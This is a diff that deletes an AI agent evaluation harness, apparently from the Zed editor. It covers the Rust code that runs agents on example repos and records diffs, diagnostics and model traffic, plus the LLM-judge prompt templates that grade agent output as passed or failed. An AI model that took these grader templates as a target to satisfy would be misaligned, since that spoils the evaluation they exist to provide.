self.clone(); - - cx.spawn(async move |cx| { - let worktree = worktree.await?; - - // Wait for worktree scan to finish before choosing a file to open. - worktree - .update(cx, |worktree, _cx| { - worktree.as_local().unwrap().scan_complete() - }) - .await; - - struct LanguageServerState { - _lsp_open_handle: OpenLspBufferHandle, - language_file_buffer: Entity, - } - - let mut diagnostics_before = None; - let mut diagnostic_summary_before = DiagnosticSummary::default(); - - let lsp = if let Some(language_server) = &meta.language_server { - // Open a file that matches the language to cause LSP to start. - let language_file = worktree - .read_with(cx, |worktree, _cx| { - worktree - .files(false, 0) - .find_map(|e| { - if e.path.clone().extension() - == Some(&language_server.file_extension) - { - Some(ProjectPath { - worktree_id: worktree.id(), - path: e.path.clone(), - }) - } else { - None - } - }) - .context("Failed to find a file for example language") - })?; - - let open_language_file_buffer_task = project.update(cx, |project, cx| { - project.open_buffer(language_file.clone(), cx) - }); - - let language_file_buffer = open_language_file_buffer_task.await?; - - let lsp_open_handle = project.update(cx, |project, cx| { - project.register_buffer_with_language_servers(&language_file_buffer, cx) - }); - - wait_for_lang_server(&project, &language_file_buffer, this.log_prefix.clone(), cx).await?; - - diagnostic_summary_before = project.read_with(cx, |project, cx| { - project.diagnostic_summary(false, cx) - }); - - diagnostics_before = query_lsp_diagnostics(project.clone(), cx).await?; - if diagnostics_before.is_some() && language_server.allow_preexisting_diagnostics { - anyhow::bail!("Example has pre-existing diagnostics. 
If you want to run this example regardless, set `allow_preexisting_diagnostics` to `true` in `base.toml`"); - } - - Some(LanguageServerState { - _lsp_open_handle: lsp_open_handle, - language_file_buffer, - }) - } else { - None - }; - - anyhow::ensure!(std::env::var("ZED_EVAL_SETUP_ONLY").is_err(), "Setup only mode"); - - let last_diff_file_path = this.run_directory.join("last.diff"); - - // Write an empty "last.diff" so that it can be opened in Zed for convenient view of the - // history using undo/redo. - std::fs::write(&last_diff_file_path, "")?; - - let thread = cx.update(|cx| { - //todo: Do we want to load rules files here? - let worktrees = project.read(cx).visible_worktrees(cx).map(|worktree| { - let root_name = worktree.read(cx).root_name_str().into(); - let abs_path = worktree.read(cx).abs_path(); - - WorktreeContext { - root_name, - abs_path, - rules_file: None, - } - }).collect::>(); - let project_context = cx.new(|_cx| ProjectContext::new(worktrees, vec![])); - let context_server_registry = cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - - let thread = if let Some(json) = &meta.existing_thread_json { - let session_id = acp::SessionId::new( - rand::rng() - .sample_iter(&distr::Alphanumeric) - .take(7) - .map(char::from) - .collect::(), - ); - - let db_thread = agent::DbThread::from_json(json.as_bytes()).expect("Can't read serialized thread"); - cx.new(|cx| agent::Thread::from_db(session_id, db_thread, project.clone(), project_context, context_server_registry, agent::Templates::new(), cx)) - } else { - cx.new(|cx| agent::Thread::new(project.clone(), project_context, context_server_registry, agent::Templates::new(), None, cx)) - }; - - thread.update(cx, |thread, cx| { - thread.add_default_tools(Rc::new(EvalThreadEnvironment { - project: project.clone(), - }), cx); - thread.set_profile(meta.profile_id.clone(), cx); - thread.set_model( - LanguageModelInterceptor::new( - 
LanguageModelRegistry::read_global(cx).default_model().expect("Missing model").model.clone(), - this.run_directory.clone(), - last_diff_file_path.clone(), - this.run_directory.join("last.messages.json"), - this.worktree_path(), - this.repo_url(), - ), - cx, - ); - }); - - thread - }); - - let mut example_cx = ExampleContext::new( - meta.clone(), - this.log_prefix.clone(), - thread.clone(), - cx.clone(), - ); - let result = this.thread.conversation(&mut example_cx).await; - - if let Err(err) = result - && !err.is::() { - return Err(err); - } - - println!("{}Stopped", this.log_prefix); - - println!("{}Getting repository diff", this.log_prefix); - let repository_diff = Self::repository_diff(this.worktree_path(), &this.repo_url()).await?; - - std::fs::write(last_diff_file_path, &repository_diff)?; - - - let mut diagnostics_after = None; - let mut diagnostic_summary_after = Default::default(); - - if let Some(language_server_state) = lsp { - wait_for_lang_server(&project, &language_server_state.language_file_buffer, this.log_prefix.clone(), cx).await?; - - println!("{}Getting diagnostics", this.log_prefix); - diagnostics_after = cx - .update(|cx| { - let project = project.clone(); - cx.spawn(async move |cx| query_lsp_diagnostics(project, cx).await) - }) - .await?; - println!("{}Got diagnostics", this.log_prefix); - - diagnostic_summary_after = project.read_with(cx, |project, cx| { - project.diagnostic_summary(false, cx) - }); - - } - - if let Some(diagnostics_before) = &diagnostics_before { - fs::write(this.run_directory.join("diagnostics_before.txt"), diagnostics_before)?; - } - - if let Some(diagnostics_after) = &diagnostics_after { - fs::write(this.run_directory.join("diagnostics_after.txt"), diagnostics_after)?; - } - - Ok(thread.update(cx, |thread, _cx| { - RunOutput { - repository_diff, - diagnostic_summary_before, - diagnostic_summary_after, - diagnostics_before, - diagnostics_after, - token_usage: thread.latest_request_token_usage().unwrap(), - tool_metrics: 
example_cx.tool_metrics.lock().unwrap().clone(), - thread_markdown: thread.to_markdown(), - programmatic_assertions: example_cx.assertions, - } - })) - }) - } - - async fn repository_diff(repository_path: PathBuf, repository_url: &str) -> Result { - run_git(&repository_path, &["add", "."]).await?; - let mut diff_args = vec!["diff", "--staged"]; - if repository_url == ZED_REPO_URL { - diff_args.push(":(exclude).rules"); - } - run_git(&repository_path, &diff_args).await - } - - pub async fn judge( - &self, - model: Arc, - run_output: &RunOutput, - cx: &AsyncApp, - ) -> JudgeOutput { - let mut output_file = - File::create(self.run_directory.join("judge.md")).expect("failed to create judge.md"); - - let diff_task = self.judge_diff(model.clone(), run_output, cx); - let thread_task = self.judge_thread(model.clone(), run_output, cx); - - let (diff_result, thread_result) = futures::join!(diff_task, thread_task); - - let (diff_response, diff_output) = diff_result; - let (thread_response, thread_output) = thread_result; - - writeln!( - &mut output_file, - "# Judgment\n\n## Thread\n\n{thread_response}\n\n## Diff\n\n{diff_response}", - ) - .log_err(); - - JudgeOutput { - thread: thread_output, - diff: diff_output, - } - } - - async fn judge_diff( - &self, - model: Arc, - run_output: &RunOutput, - cx: &AsyncApp, - ) -> (String, AssertionsReport) { - let diff_assertions = self.thread.diff_assertions(); - - if diff_assertions.is_empty() { - return ( - "No diff assertions".to_string(), - AssertionsReport::default(), - ); - } - - println!("{}Running diff judge", self.log_prefix); - - let judge_diff_prompt = include_str!("judge_diff_prompt.hbs"); - let judge_diff_prompt_name = "judge_diff_prompt"; - let mut hbs = Handlebars::new(); - hbs.register_template_string(judge_diff_prompt_name, judge_diff_prompt) - .unwrap(); - - let to_prompt = |assertion: String| { - hbs.render( - judge_diff_prompt_name, - &JudgeDiffInput { - repository_diff: run_output.repository_diff.clone(), - 
assertion, - }, - ) - .unwrap() - }; - - let (responses, report) = self - .judge_assertions(model, diff_assertions, to_prompt, cx) - .await; - - println!( - "{}Judge - Diff score: {}%", - self.log_prefix, - report.passed_percentage() - ); - - (responses, report) - } - - async fn judge_thread( - &self, - model: Arc, - run_output: &RunOutput, - cx: &AsyncApp, - ) -> (String, AssertionsReport) { - let thread_assertions = self.thread.thread_assertions(); - - if thread_assertions.is_empty() { - return ( - "No thread assertions".to_string(), - AssertionsReport::default(), - ); - } - - let judge_thread_prompt = include_str!("judge_thread_prompt.hbs"); - let judge_thread_prompt_name = "judge_thread_prompt"; - let mut hbs = Handlebars::new(); - hbs.register_template_string(judge_thread_prompt_name, judge_thread_prompt) - .unwrap(); - - let complete_messages = &run_output.thread_markdown; - let to_prompt = |assertion: String| { - hbs.render( - judge_thread_prompt_name, - &JudgeThreadInput { - messages: complete_messages.clone(), - assertion, - }, - ) - .unwrap() - }; - - let (responses, report) = self - .judge_assertions(model, thread_assertions, to_prompt, cx) - .await; - - println!( - "{}Judge - Thread score: {}%", - self.log_prefix, - report.passed_percentage() - ); - - (responses, report) - } - - async fn judge_assertions( - &self, - model: Arc, - assertions: Vec, - to_prompt: impl Fn(String) -> String, - cx: &AsyncApp, - ) -> (String, AssertionsReport) { - let assertions = assertions.into_iter().map(|assertion| { - let request = LanguageModelRequest { - thread_id: None, - prompt_id: None, - intent: None, - messages: vec![LanguageModelRequestMessage { - role: Role::User, - content: vec![MessageContent::Text(to_prompt(assertion.description))], - cache: false, - reasoning_details: None, - }], - temperature: None, - tools: Vec::new(), - tool_choice: None, - stop: Vec::new(), - thinking_allowed: true, - thinking_effort: None, - speed: None, - }; - - let model = 
model.clone(); - let log_prefix = self.log_prefix.clone(); - async move { - let response = send_language_model_request(model, request, cx).await; - - let (response, result) = match response { - Ok(response) => ( - response.clone(), - parse_assertion_result(&response).map_err(|err| err.to_string()), - ), - Err(err) => (err.to_string(), Err(err.to_string())), - }; - - if result.is_ok() { - println!("{}✅ {}", log_prefix, assertion.id); - } else { - println!("{}❌ {}", log_prefix, assertion.id); - } - - ( - response, - RanAssertion { - id: assertion.id, - result, - }, - ) - } - }); - - let mut responses = String::new(); - let mut report = AssertionsReport::default(); - - for (response, assertion) in future::join_all(assertions).await { - writeln!(&mut responses, "# {}", assertion.id).unwrap(); - writeln!(&mut responses, "{}\n\n", response).unwrap(); - report.ran.push(assertion); - } - - (responses, report) - } -} - -struct EvalThreadEnvironment { - project: Entity, -} - -struct EvalTerminalHandle { - terminal: Entity, -} - -impl agent::TerminalHandle for EvalTerminalHandle { - fn id(&self, cx: &AsyncApp) -> Result { - Ok(self.terminal.read_with(cx, |term, _cx| term.id().clone())) - } - - fn wait_for_exit(&self, cx: &AsyncApp) -> Result>> { - Ok(self - .terminal - .read_with(cx, |term, _cx| term.wait_for_exit())) - } - - fn current_output(&self, cx: &AsyncApp) -> Result { - Ok(self - .terminal - .read_with(cx, |term, cx| term.current_output(cx))) - } - - fn kill(&self, cx: &AsyncApp) -> Result<()> { - cx.update(|cx| { - self.terminal.update(cx, |terminal, cx| { - terminal.kill(cx); - }); - }); - Ok(()) - } - - fn was_stopped_by_user(&self, cx: &AsyncApp) -> Result { - Ok(self - .terminal - .read_with(cx, |term, _cx| term.was_stopped_by_user())) - } -} - -impl agent::ThreadEnvironment for EvalThreadEnvironment { - fn create_terminal( - &self, - command: String, - cwd: Option, - output_byte_limit: Option, - cx: &mut AsyncApp, - ) -> Task>> { - let project = 
self.project.clone(); - cx.spawn(async move |cx| { - let language_registry = - project.read_with(cx, |project, _cx| project.languages().clone()); - let id = acp::TerminalId::new(uuid::Uuid::new_v4().to_string()); - let terminal = - acp_thread::create_terminal_entity(command, &[], vec![], cwd.clone(), &project, cx) - .await?; - let terminal = cx.new(|cx| { - acp_thread::Terminal::new( - id, - "", - cwd, - output_byte_limit.map(|limit| limit as usize), - terminal, - language_registry, - cx, - ) - }); - Ok(Rc::new(EvalTerminalHandle { terminal }) as Rc) - }) - } - - fn create_subagent( - &self, - _label: String, - _cx: &mut App, - ) -> Result> { - unimplemented!() - } -} - -struct LanguageModelInterceptor { - model: Arc, - request_count: Arc>, - previous_diff: Arc>, - example_output_dir: PathBuf, - last_diff_file_path: PathBuf, - messages_json_file_path: PathBuf, - repository_path: PathBuf, - repository_url: String, -} - -impl LanguageModelInterceptor { - fn new( - model: Arc, - example_output_dir: PathBuf, - last_diff_file_path: PathBuf, - messages_json_file_path: PathBuf, - repository_path: PathBuf, - repository_url: String, - ) -> Arc { - Arc::new(Self { - model, - request_count: Arc::new(Mutex::new(0)), - previous_diff: Arc::new(Mutex::new("".to_string())), - example_output_dir, - last_diff_file_path, - messages_json_file_path, - repository_path, - repository_url, - }) - } -} - -impl language_model::LanguageModel for LanguageModelInterceptor { - fn id(&self) -> language_model::LanguageModelId { - self.model.id() - } - - fn name(&self) -> language_model::LanguageModelName { - self.model.name() - } - - fn provider_id(&self) -> language_model::LanguageModelProviderId { - self.model.provider_id() - } - - fn provider_name(&self) -> language_model::LanguageModelProviderName { - self.model.provider_name() - } - - fn telemetry_id(&self) -> String { - self.model.telemetry_id() - } - - fn supports_images(&self) -> bool { - self.model.supports_images() - } - - fn 
supports_tools(&self) -> bool { - self.model.supports_tools() - } - - fn supports_tool_choice(&self, choice: language_model::LanguageModelToolChoice) -> bool { - self.model.supports_tool_choice(choice) - } - - fn max_token_count(&self) -> u64 { - self.model.max_token_count() - } - - fn count_tokens( - &self, - request: LanguageModelRequest, - cx: &App, - ) -> future::BoxFuture<'static, Result> { - self.model.count_tokens(request, cx) - } - - fn stream_completion( - &self, - request: LanguageModelRequest, - cx: &AsyncApp, - ) -> future::BoxFuture< - 'static, - Result< - futures::stream::BoxStream< - 'static, - Result, - >, - language_model::LanguageModelCompletionError, - >, - > { - let stream = self.model.stream_completion(request.clone(), cx); - let request_count = self.request_count.clone(); - let previous_diff = self.previous_diff.clone(); - let example_output_dir = self.example_output_dir.clone(); - let last_diff_file_path = self.last_diff_file_path.clone(); - let messages_json_file_path = self.messages_json_file_path.clone(); - let repository_path = self.repository_path.clone(); - let repository_url = self.repository_url.clone(); - - Box::pin(async move { - let stream = stream.await?; - - let response_events = Arc::new(Mutex::new(Vec::new())); - let request_clone = request.clone(); - - let wrapped_stream = stream.then(move |event| { - let response_events = response_events.clone(); - let request = request_clone.clone(); - let request_count = request_count.clone(); - let previous_diff = previous_diff.clone(); - let example_output_dir = example_output_dir.clone(); - let last_diff_file_path = last_diff_file_path.clone(); - let messages_json_file_path = messages_json_file_path.clone(); - let repository_path = repository_path.clone(); - let repository_url = repository_url.clone(); - - async move { - let event_result = match &event { - Ok(ev) => Ok(ev.clone()), - Err(err) => Err(err.to_string()), - }; - response_events.lock().unwrap().push(event_result); - - let 
should_execute = matches!( - &event, - Ok(LanguageModelCompletionEvent::Stop { .. }) | Err(_) - ); - - if should_execute { - let current_request_count = { - let mut count = request_count.lock().unwrap(); - *count += 1; - *count - }; - - let messages_file_path = - example_output_dir.join(format!("{current_request_count}.messages.md")); - let diff_file_path = - example_output_dir.join(format!("{current_request_count}.diff")); - let last_messages_file_path = example_output_dir.join("last.messages.md"); - - let collected_events = response_events.lock().unwrap().clone(); - let request_markdown = RequestMarkdown::new(&request); - let response_events_markdown = - response_events_to_markdown(&collected_events); - let dialog = ThreadDialog::new(&request, &collected_events); - let dialog_json = - serde_json::to_string_pretty(&dialog.to_combined_request()) - .unwrap_or_default(); - - let messages = format!( - "{}\n\n{}", - request_markdown.messages, response_events_markdown - ); - fs::write(&messages_file_path, messages.clone()) - .expect("failed to write messages file"); - fs::write(&last_messages_file_path, messages) - .expect("failed to write last messages file"); - fs::write(&messages_json_file_path, dialog_json) - .expect("failed to write last.messages.json"); - - // Get repository diff - let diff_result = - ExampleInstance::repository_diff(repository_path, &repository_url) - .await; - - match diff_result { - Ok(diff) => { - let prev_diff = previous_diff.lock().unwrap().clone(); - if diff != prev_diff { - fs::write(&diff_file_path, &diff) - .expect("failed to write diff file"); - fs::write(&last_diff_file_path, &diff) - .expect("failed to write last diff file"); - *previous_diff.lock().unwrap() = diff; - } - } - Err(err) => { - let error_message = format!("{err:?}"); - fs::write(&diff_file_path, &error_message) - .expect("failed to write diff error to file"); - fs::write(&last_diff_file_path, &error_message) - .expect("failed to write last diff file"); - } - } - - if 
current_request_count == 1 { - let tools_file_path = example_output_dir.join("tools.md"); - fs::write(tools_file_path, request_markdown.tools) - .expect("failed to write tools file"); - } - } - - event - } - }); - - Ok(Box::pin(wrapped_stream) - as futures::stream::BoxStream< - 'static, - Result< - LanguageModelCompletionEvent, - language_model::LanguageModelCompletionError, - >, - >) - }) - } -} - -pub fn wait_for_lang_server( - project: &Entity, - buffer: &Entity, - log_prefix: String, - cx: &mut AsyncApp, -) -> Task> { - if std::env::var("ZED_EVAL_SKIP_LS").is_ok() { - return Task::ready(Ok(())); - } - - println!("{}⏵ Waiting for language server", log_prefix); - - let (mut tx, mut rx) = mpsc::channel(1); - - let lsp_store = project.read_with(cx, |project, _| project.lsp_store()); - - let has_lang_server = buffer.update(cx, |buffer, cx| { - lsp_store.update(cx, |lsp_store, cx| { - lsp_store - .running_language_servers_for_local_buffer(buffer, cx) - .next() - .is_some() - }) - }); - - if has_lang_server { - project - .update(cx, |project, cx| project.save_buffer(buffer.clone(), cx)) - .detach(); - } - - let subscriptions = - [ - cx.subscribe(&lsp_store, { - let log_prefix = log_prefix.clone(); - move |_, event, _| { - if let project::LspStoreEvent::LanguageServerUpdate { - message: - client::proto::update_language_server::Variant::WorkProgress( - LspWorkProgress { - message: Some(message), - .. - }, - ), - .. - } = event - { - println!("{}⟲ {message}", log_prefix) - } - } - }), - cx.subscribe(project, { - let buffer = buffer.clone(); - move |project, event, cx| match event { - project::Event::LanguageServerAdded(_, _, _) => { - let buffer = buffer.clone(); - project - .update(cx, |project, cx| project.save_buffer(buffer, cx)) - .detach(); - } - project::Event::DiskBasedDiagnosticsFinished { .. 
} => { - tx.try_send(()).ok(); - } - _ => {} - } - }), - ]; - - cx.spawn(async move |cx| { - let timeout = cx.background_executor().timer(Duration::new(60 * 5, 0)); - let result = futures::select! { - _ = rx.next() => { - println!("{}⚑ Language server idle", log_prefix); - anyhow::Ok(()) - }, - _ = timeout.fuse() => { - anyhow::bail!("LSP wait timed out after 5 minutes"); - } - }; - drop(subscriptions); - result - }) -} - -pub async fn query_lsp_diagnostics( - project: Entity, - cx: &mut AsyncApp, -) -> Result> { - let paths_with_diagnostics = project.update(cx, |project, cx| { - project - .diagnostic_summaries(true, cx) - .filter(|(_, _, summary)| summary.error_count > 0 || summary.warning_count > 0) - .map(|(project_path, _, _)| project_path) - .collect::>() - }); - - if paths_with_diagnostics.is_empty() { - return Ok(None); - } - - let mut output = String::new(); - for project_path in paths_with_diagnostics { - let buffer = project - .update(cx, |project, cx| project.open_buffer(project_path, cx)) - .await?; - let snapshot = buffer.read_with(cx, |buffer, _cx| buffer.snapshot()); - - for (_, group) in snapshot.diagnostic_groups(None) { - let entry = &group.entries[group.primary_ix]; - let range = entry.range.to_point(&snapshot); - let severity = match entry.diagnostic.severity { - DiagnosticSeverity::ERROR => "error", - DiagnosticSeverity::WARNING => "warning", - _ => continue, - }; - - writeln!( - output, - "{} at line {}: {}", - severity, - range.start.row + 1, - entry.diagnostic.message - )?; - } - } - anyhow::Ok(Some(output)) -} - -fn parse_assertion_result(response: &str) -> Result { - let analysis = get_tag("analysis", response)?; - let passed = match get_tag("passed", response)?.to_lowercase().as_str() { - "true" => true, - "false" => false, - value @ _ => bail!("invalid judge `passed` tag: {value}"), - }; - Ok(RanAssertionResult { - analysis: Some(analysis), - passed, - }) -} - -fn get_tag(name: &'static str, response: &str) -> Result { - let start_tag = 
format!("<{}>", name); - let end_tag = format!("", name); - - let start_ix = response - .find(&start_tag) - .context(format!("{} start tag not found", name))?; - let content_start_ix = start_ix + start_tag.len(); - - let end_ix = content_start_ix - + response[content_start_ix..] - .find(&end_tag) - .context(format!("{} end tag not found", name))?; - - let content = response[content_start_ix..end_ix].trim().unindent(); - - anyhow::Ok(content) -} - -pub fn repo_path_for_url(repos_dir: &Path, repo_url: &str) -> PathBuf { - let repo_name = repo_url - .trim_start_matches("https://") - .replace(|c: char| !c.is_alphanumeric(), "-"); - Path::new(repos_dir).join(repo_name) -} - -pub async fn run_git(repo_path: &Path, args: &[&str]) -> Result { - let output = new_command("git") - .current_dir(repo_path) - .args(args) - .output() - .await?; - - anyhow::ensure!( - output.status.success(), - "`git {}` within `{}` failed with status: {}\nstderr:\n{}\nstdout:\n{}", - args.join(" "), - repo_path.display(), - output.status, - String::from_utf8_lossy(&output.stderr), - String::from_utf8_lossy(&output.stdout), - ); - Ok(String::from_utf8(output.stdout)?.trim().to_string()) -} - -fn push_role(role: &Role, buf: &mut String, assistant_message_number: &mut u32) { - match role { - Role::System => buf.push_str("# ⚙️ SYSTEM\n\n"), - Role::User => buf.push_str("# 👤 USER\n\n"), - Role::Assistant => { - buf.push_str(&format!("# 🤖 ASSISTANT {assistant_message_number}\n\n")); - *assistant_message_number = *assistant_message_number + 1; - } - } -} - -pub async fn send_language_model_request( - model: Arc, - request: LanguageModelRequest, - cx: &AsyncApp, -) -> anyhow::Result { - match model.stream_completion_text(request, cx).await { - Ok(mut stream) => { - let mut full_response = String::new(); - while let Some(chunk_result) = stream.stream.next().await { - match chunk_result { - Ok(chunk_str) => { - full_response.push_str(&chunk_str); - } - Err(err) => { - anyhow::bail!("Error receiving 
response from language model: {err}"); - } - } - } - Ok(full_response) - } - Err(err) => Err(anyhow!( - "Failed to get response from language model. Error was: {err}" - )), - } -} - -pub struct RequestMarkdown { - pub tools: String, - pub messages: String, -} - -impl RequestMarkdown { - pub fn new(request: &LanguageModelRequest) -> Self { - let mut tools = String::new(); - let mut messages = String::new(); - let mut assistant_message_number: u32 = 1; - - // Print the tools - if !request.tools.is_empty() { - for tool in &request.tools { - write!(&mut tools, "# {}\n\n", tool.name).unwrap(); - write!(&mut tools, "{}\n\n", tool.description).unwrap(); - writeln!( - &mut tools, - "{}", - MarkdownCodeBlock { - tag: "json", - text: &format!("{:#}", tool.input_schema) - } - ) - .unwrap(); - } - } - - // Print the messages - for message in &request.messages { - push_role(&message.role, &mut messages, &mut assistant_message_number); - - for content in &message.content { - match content { - MessageContent::Text(text) => { - messages.push_str(text); - messages.push_str("\n\n"); - } - MessageContent::Image(_) => { - messages.push_str("[IMAGE DATA]\n\n"); - } - MessageContent::Thinking { text, signature } => { - messages.push_str("**Thinking**:\n\n"); - if let Some(sig) = signature { - messages.push_str(&format!("Signature: {}\n\n", sig)); - } - messages.push_str(text); - messages.push_str("\n"); - } - MessageContent::RedactedThinking(items) => { - messages.push_str(&format!( - "**Redacted Thinking**: {} item(s)\n\n", - items.len() - )); - } - MessageContent::ToolUse(tool_use) => { - messages.push_str(&format!( - "**Tool Use**: {} (ID: {})\n", - tool_use.name, tool_use.id - )); - messages.push_str(&format!( - "{}\n", - MarkdownCodeBlock { - tag: "json", - text: &format!("{:#}", tool_use.input) - } - )); - } - MessageContent::ToolResult(tool_result) => { - messages.push_str(&format!( - "**Tool Result**: {} (ID: {})\n\n", - tool_result.tool_name, tool_result.tool_use_id - )); - if 
tool_result.is_error { - messages.push_str("**ERROR:**\n"); - } - - match &tool_result.content { - LanguageModelToolResultContent::Text(text) => { - writeln!(messages, "{text}\n").ok(); - } - LanguageModelToolResultContent::Image(image) => { - writeln!(messages, "![Image](data:base64,{})\n", image.source).ok(); - } - } - - if let Some(output) = tool_result.output.as_ref() { - writeln!( - messages, - "**Debug Output**:\n\n```json\n{}\n```\n", - serde_json::to_string_pretty(output).unwrap() - ) - .unwrap(); - } - } - } - } - } - - Self { tools, messages } - } -} - -pub fn response_events_to_markdown( - response_events: &[std::result::Result], -) -> String { - let mut response = String::new(); - // Print the response events if any - response.push_str("# Response\n\n"); - let mut text_buffer = String::new(); - let mut thinking_buffer = String::new(); - - let flush_buffers = - |output: &mut String, text_buffer: &mut String, thinking_buffer: &mut String| { - if !text_buffer.is_empty() { - output.push_str(&format!("**Text**:\n{}\n\n", text_buffer)); - text_buffer.clear(); - } - if !thinking_buffer.is_empty() { - output.push_str(&format!("**Thinking**:\n{}\n\n", thinking_buffer)); - thinking_buffer.clear(); - } - }; - - for event in response_events { - match event { - Ok(LanguageModelCompletionEvent::Text(text)) => { - text_buffer.push_str(text); - } - Ok(LanguageModelCompletionEvent::Thinking { text, .. }) => { - thinking_buffer.push_str(text); - } - Ok(LanguageModelCompletionEvent::RedactedThinking { .. 
}) => {} - Ok(LanguageModelCompletionEvent::Stop(reason)) => { - flush_buffers(&mut response, &mut text_buffer, &mut thinking_buffer); - response.push_str(&format!("**Stop**: {:?}\n\n", reason)); - } - Ok(LanguageModelCompletionEvent::ToolUse(tool_use)) => { - flush_buffers(&mut response, &mut text_buffer, &mut thinking_buffer); - response.push_str(&format!( - "**Tool Use**: {} (ID: {})\n", - tool_use.name, tool_use.id - )); - response.push_str(&format!( - "{}\n", - MarkdownCodeBlock { - tag: "json", - text: &format!("{:#}", tool_use.input) - } - )); - } - Ok( - LanguageModelCompletionEvent::UsageUpdate(_) - | LanguageModelCompletionEvent::StartMessage { .. } - | LanguageModelCompletionEvent::Queued { .. } - | LanguageModelCompletionEvent::Started - | LanguageModelCompletionEvent::ReasoningDetails(_), - ) => {} - Ok(LanguageModelCompletionEvent::ToolUseJsonParseError { - json_parse_error, .. - }) => { - flush_buffers(&mut response, &mut text_buffer, &mut thinking_buffer); - response.push_str(&format!( - "**Error**: parse error in tool use JSON: {}\n\n", - json_parse_error - )); - } - Err(error) => { - flush_buffers(&mut response, &mut text_buffer, &mut thinking_buffer); - response.push_str(&format!("**Error**: {}\n\n", error)); - } - } - } - - flush_buffers(&mut response, &mut text_buffer, &mut thinking_buffer); - - response -} - -#[derive(Clone, Debug, Serialize, Deserialize, PartialEq)] -pub struct ThreadDialog { - pub request: LanguageModelRequest, - pub response_events: Vec>, -} - -impl ThreadDialog { - pub fn new( - request: &LanguageModelRequest, - response_events: &[std::result::Result], - ) -> Self { - Self { - request: request.clone(), - response_events: response_events.to_vec(), - } - } - - /// Represents all request and response messages in a unified format. - /// - /// Specifically, it appends the assistant's response (derived from response events) - /// as a new message to existing messages in the request. 
- pub fn to_combined_request(&self) -> LanguageModelRequest { - let mut request = self.request.clone(); - if let Some(assistant_message) = self.response_events_to_message() { - request.messages.push(assistant_message); - } - request - } - fn response_events_to_message(&self) -> Option { - let response_events = &self.response_events; - let mut content: Vec = Vec::new(); - let mut current_text = String::new(); - - let flush_text = |text: &mut String, content: &mut Vec| { - if !text.is_empty() { - content.push(MessageContent::Text(std::mem::take(text))); - } - }; - - for event in response_events { - match event { - Ok(LanguageModelCompletionEvent::Text(text)) => { - current_text.push_str(text); - } - - Ok(LanguageModelCompletionEvent::ToolUse(tool_use)) => { - flush_text(&mut current_text, &mut content); - if tool_use.is_input_complete { - content.push(MessageContent::ToolUse(tool_use.clone())); - } - } - Ok(LanguageModelCompletionEvent::Thinking { text, signature }) => { - flush_text(&mut current_text, &mut content); - content.push(MessageContent::Thinking { - text: text.clone(), - signature: signature.clone(), - }); - } - - // Skip these - Ok(LanguageModelCompletionEvent::UsageUpdate(_)) - | Ok(LanguageModelCompletionEvent::RedactedThinking { .. }) - | Ok(LanguageModelCompletionEvent::StartMessage { .. }) - | Ok(LanguageModelCompletionEvent::ReasoningDetails(_)) - | Ok(LanguageModelCompletionEvent::Stop(_)) - | Ok(LanguageModelCompletionEvent::Queued { .. }) - | Ok(LanguageModelCompletionEvent::Started) => {} - - Ok(LanguageModelCompletionEvent::ToolUseJsonParseError { - json_parse_error, - .. 
- }) => { - flush_text(&mut current_text, &mut content); - content.push(MessageContent::Text(format!( - "ERROR: parse error in tool use JSON: {}", - json_parse_error - ))); - } - - Err(error) => { - flush_text(&mut current_text, &mut content); - content.push(MessageContent::Text(format!("ERROR: {}", error))); - } - } - } - - flush_text(&mut current_text, &mut content); - - if !content.is_empty() { - Some(LanguageModelRequestMessage { - role: Role::Assistant, - content, - cache: false, - reasoning_details: None, - }) - } else { - None - } - } -} - -#[cfg(test)] -mod test { - use super::*; - - #[test] - fn test_parse_judge_output() { - let response = r#" - The model did a good job but there were still compilations errors. - true - "# - .unindent(); - - let output = parse_assertion_result(&response).unwrap(); - assert_eq!( - output.analysis, - Some("The model did a good job but there were still compilations errors.".into()) - ); - assert!(output.passed); - - let response = r#" - Text around ignored - - - Failed to compile: - - Error 1 - - Error 2 - - - false - "# - .unindent(); - - let output = parse_assertion_result(&response).unwrap(); - assert_eq!( - output.analysis, - Some("Failed to compile:\n- Error 1\n- Error 2".into()) - ); - assert!(!output.passed); - } -} diff --git a/crates/eval/src/judge_diff_prompt.hbs b/crates/eval/src/judge_diff_prompt.hbs deleted file mode 100644 index 24ef9ac97e389ab5a3059eead27727343786cb1b..0000000000000000000000000000000000000000 --- a/crates/eval/src/judge_diff_prompt.hbs +++ /dev/null @@ -1,25 +0,0 @@ -You are an expert software developer. Your task is to evaluate a diff produced by an AI agent -in response to a prompt. 
Here is the prompt and the diff: - - -{{{prompt}}} - - - -{{{repository_diff}}} - - -Evaluate whether or not the diff passes the following assertion: - - -{{assertion}} - - -Analyze the diff hunk by hunk, and structure your answer in the following XML format: - -``` -{YOUR ANALYSIS HERE} -{PASSED_ASSERTION} -``` - -Where `PASSED_ASSERTION` is either `true` or `false`. diff --git a/crates/eval/src/judge_thread_prompt.hbs b/crates/eval/src/judge_thread_prompt.hbs deleted file mode 100644 index e80bafcce1f46ddddb236e572b27f51960a5a223..0000000000000000000000000000000000000000 --- a/crates/eval/src/judge_thread_prompt.hbs +++ /dev/null @@ -1,21 +0,0 @@ -You are an expert software developer. -Your task is to evaluate an AI agent's messages and tool calls in this conversation: - - -{{{messages}}} - - -Evaluate whether or not the sequence of messages passes the following assertion: - - -{{{assertion}}} - - -Analyze the messages one by one, and structure your answer in the following XML format: - -``` -{YOUR ANALYSIS HERE} -{PASSED_ASSERTION} -``` - -Where `PASSED_ASSERTION` is either `true` or `false`. 
diff --git a/crates/eval/src/tool_metrics.rs b/crates/eval/src/tool_metrics.rs deleted file mode 100644 index 63d8a4f2bc4d1be477a81e92aa2a68683f9d6434..0000000000000000000000000000000000000000 --- a/crates/eval/src/tool_metrics.rs +++ /dev/null @@ -1,106 +0,0 @@ -use collections::HashMap; -use serde::{Deserialize, Serialize}; -use std::{fmt::Display, sync::Arc}; - -#[derive(Debug, Default, Clone, Serialize, Deserialize)] -pub struct ToolMetrics { - pub use_counts: HashMap, u32>, - pub failure_counts: HashMap, u32>, -} - -impl ToolMetrics { - pub fn insert(&mut self, tool_name: Arc, succeeded: bool) { - *self.use_counts.entry(tool_name.clone()).or_insert(0) += 1; - if !succeeded { - *self.failure_counts.entry(tool_name).or_insert(0) += 1; - } - } - - pub fn merge(&mut self, other: &ToolMetrics) { - for (tool_name, use_count) in &other.use_counts { - *self.use_counts.entry(tool_name.clone()).or_insert(0) += use_count; - } - for (tool_name, failure_count) in &other.failure_counts { - *self.failure_counts.entry(tool_name.clone()).or_insert(0) += failure_count; - } - } - 